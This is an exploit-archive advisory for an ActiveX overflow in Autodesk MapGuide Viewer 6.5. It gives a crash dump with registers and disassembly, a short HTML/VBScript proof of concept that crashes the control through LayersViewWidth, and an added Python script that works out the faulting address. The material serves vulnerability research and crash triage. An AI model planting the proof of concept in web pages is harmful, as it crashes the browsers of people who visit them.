Autodesk MapGuide Viewer Overflow

Posted Sep 1, 2010
Authored by d3b4g

Autodesk MapGuide Viewer version 6.5 suffers from an ActiveX-related overflow vulnerability in MGAXCTRL.DLL.

tags | exploit, overflow, activex
SHA-256 | b80514466ac4b3172c33af964fa09b1de9d10ee0d597300d79654121f85f1056

# Exploit Title: Autodesk MapGuide Viewer ActiveX (MGAXCTRL.DLL) Overflow Vulnerability
# Date: [01-09-2010]
# Author: [d3b4g]
# Software Link: http://usa.autodesk.com/adsk/servlet/item?siteID=123112&id=9454821
# Version: [6.5]
# Tested on: [Winxp SP3]
# regards to ROL guys





Exception Code: ACCESS_VIOLATION
Disasm: 175CE9E CMP DWORD PTR [ESI+1C],0 (MGAXCTRL.DLL)

Seh Chain:
--------------------------------------------------
1 192847C MGAXCTRL.DLL
2 73352542 VBSCRIPT.dll
3 7C839AD8 KERNEL32.dll



Registers:
--------------------------------------------------
EIP 0175CE9E
EAX 00000001
EBX 003EB690 -> 0193F684
ECX 00000000
EDX 003E0608 -> 00180F98
EDI 003EB5D8 -> 0193FC24
ESI 00000404
EBP 0013EA84 -> 0013EAA0
ESP 0013EA58 -> 003EB644



ArgDump:
--------------------------------------------------
EBP+8 003EB644 -> 0193F90C
EBP+12 00000000
EBP+16 0013EAD4 -> 00130000
EBP+20 0042C4F4 -> 00110024
EBP+24 0013EA94 -> 0013EAD4
EBP+28 0013EB30 -> 0013EBC0


Block Disassembly:
--------------------------------------------------
175CE8F POP ESI
175CE90 JMP [EAX+60]
175CE93 PUSH ESI
175CE94 LEA ESI,[ECX+404]
175CE9A TEST ESI,ESI
175CE9C JE SHORT 0175CEC2
175CE9E CMP DWORD PTR [ESI+1C],0 <--- CRASH
175CEA2 JE SHORT 0175CEC2
175CEA4 PUSH 0
175CEA6 PUSH DWORD PTR [ESP+C]
175CEAA MOV ECX,ESI
175CEAC PUSH 0
175CEAE CALL 01912C63
175CEB3 MOV EAX,[ESI]
175CEB5 MOV ECX,ESI





PoC:


<object classid='clsid:62789780-B744-11D0-986B-00609731A21D' id='target' />
<script language='vbscript'>

'File Generated by COMRaider v0.0.133 - http://labs.idefense.com

'Wscript.echo typename(target)

'for debugging/custom prolog
targetFile = "C:\Program Files\Autodesk\MapGuideViewerActiveX6.5\MgAxCtrl.dll"
prototype = "Property Let LayersViewWidth As Long"
memberName = "LayersViewWidth"
progid = "MGMapControl.MGMap"
argCount = 1

arg1=0

target.LayersViewWidth = arg1

</script>
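
Added example, not part of the original advisory: a Python triage of the crash dump above that computes the address read by the faulting `CMP DWORD PTR [ESI+1C],0` from the dumped register values. The function names, the `NULL_GUARD` threshold and the classification labels are choices made for this example.

```python
import re

# Constructed input: faulting instruction and registers copied from the dump on this page.
DUMP = """\
Disasm: 175CE9E CMP DWORD PTR [ESI+1C],0 (MGAXCTRL.DLL)
EIP 0175CE9E
EAX 00000001
EBX 003EB690 -> 0193F684
ECX 00000000
EDX 003E0608 -> 00180F98
EDI 003EB5D8 -> 0193FC24
ESI 00000404
EBP 0013EA84 -> 0013EAA0
ESP 0013EA58 -> 003EB644
"""

NULL_GUARD = 0x10000  # Windows keeps the first 64 KiB of user address space unmapped

REG_RE = re.compile(r"^(E[A-Z]{2})\s+([0-9A-Fa-f]{1,8})\b", re.M)
MEM_RE = re.compile(r"\[(E[A-Z]{2})(?:([+-])([0-9A-Fa-f]+))?\]")


def parse_registers(dump):
    """Return {register: value} from the register lines of the dump."""
    return {name: int(val, 16) for name, val in REG_RE.findall(dump)}


def faulting_address(dump):
    """Effective address of the [REG+disp] operand on the 'Disasm:' line."""
    line = next(l for l in dump.splitlines() if l.startswith("Disasm:"))
    m = MEM_RE.search(line)
    if m is None:
        raise ValueError("no [REG+disp] memory operand in faulting instruction")
    base, sign, disp = m.groups()
    offset = int(disp, 16) if disp else 0
    regs = parse_registers(dump)
    return (regs[base] + (-offset if sign == "-" else offset)) & 0xFFFFFFFF


def classify(dump):
    """Label the fault by where the faulting operand points."""
    addr = faulting_address(dump)
    kind = "near-null dereference" if addr < NULL_GUARD else "wild pointer access"
    return addr, kind


if __name__ == "__main__":
    addr, kind = classify(DUMP)
    print(f"faulting operand at 0x{addr:08X}: {kind}")
```

With ECX at 0, the `LEA ESI,[ECX+404]` in the block disassembly yields ESI = 0x404, so the faulting read lands at 0x420.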
